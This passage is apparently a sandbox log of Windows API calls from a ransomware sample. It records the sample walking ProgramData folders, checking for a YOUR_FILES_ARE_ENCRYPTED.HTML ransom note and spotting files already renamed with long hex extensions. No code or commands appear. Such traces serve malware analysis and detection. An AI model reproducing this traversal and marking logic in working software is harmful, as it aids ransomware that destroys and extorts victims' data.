hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.909] GetProcessHeap () returned 0x270000 [0169.909] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.909] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Office", cAlternateFileName="")) returned 1 [0169.910] GetProcessHeap () returned 0x270000 [0169.910] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.910] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" [0169.910] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*" [0169.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0169.910] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.910] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0169.910] lstrlenW (lpString="") returned 0 [0169.910] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.910] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.910] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.910] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.911] GetProcessHeap () returned 0x270000 [0169.911] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.911] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OfficeSoftwareProtectionPlatform", 
cAlternateFileName="OFFICE~1")) returned 1 [0169.911] GetProcessHeap () returned 0x270000 [0169.911] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.912] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0169.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*" [0169.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.912] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbd08d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbd08d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.912] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Cache", cAlternateFileName="")) returned 1 [0169.912] GetProcessHeap () returned 0x270000 [0169.912] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.912] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0169.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*" [0169.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcbe13700, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcbe13700, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614", cAlternateFileName="CACHED~1.3A1")) returned 1 [0169.913] lstrcmpW (lpString1="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.913] PathFindExtensionW (pszPath="cache.dat.3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614" [0169.913] lstrlenW (lpString=".3A13EABE8ED76782B565006BF4AA5900684EFB44BB0B5840529944997F6CB614") returned 65 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.913] lstrcmpW 
(lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.913] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.913] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.913] GetProcessHeap () returned 0x270000 [0169.914] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcbded5a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B", cAlternateFileName="TOKENS~1.C12")) returned 1 [0169.914] lstrcmpW 
(lpString1="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.914] PathFindExtensionW (pszPath="tokens.dat.C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B" [0169.914] lstrlenW (lpString=".C121F1260EB0985AFD094E1B512A9579D109C8CD69782C5212B10AA3C7C50D4B") returned 65 [0169.914] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.915] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbcbcaa0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbcbcaa0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbcbcaa0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.915] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\officesoftwareprotectionplatform\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.915] GetProcessHeap () returned 0x270000 [0169.916] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.916] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RAC", cAlternateFileName="")) returned 1 [0169.916] GetProcessHeap () returned 0x270000 [0169.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.916] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC" [0169.916] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*" [0169.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.916] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.916] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outbound", cAlternateFileName="")) returned 1 [0169.916] GetProcessHeap () returned 0x270000 [0169.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.916] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" [0169.917] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*" [0169.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.917] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.917] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.917] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.917] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", 
cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.917] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.917] GetProcessHeap () returned 0x270000 [0169.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.918] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0169.918] GetProcessHeap () returned 0x270000 [0169.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.918] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" [0169.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*" [0169.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x4ebd848 | 
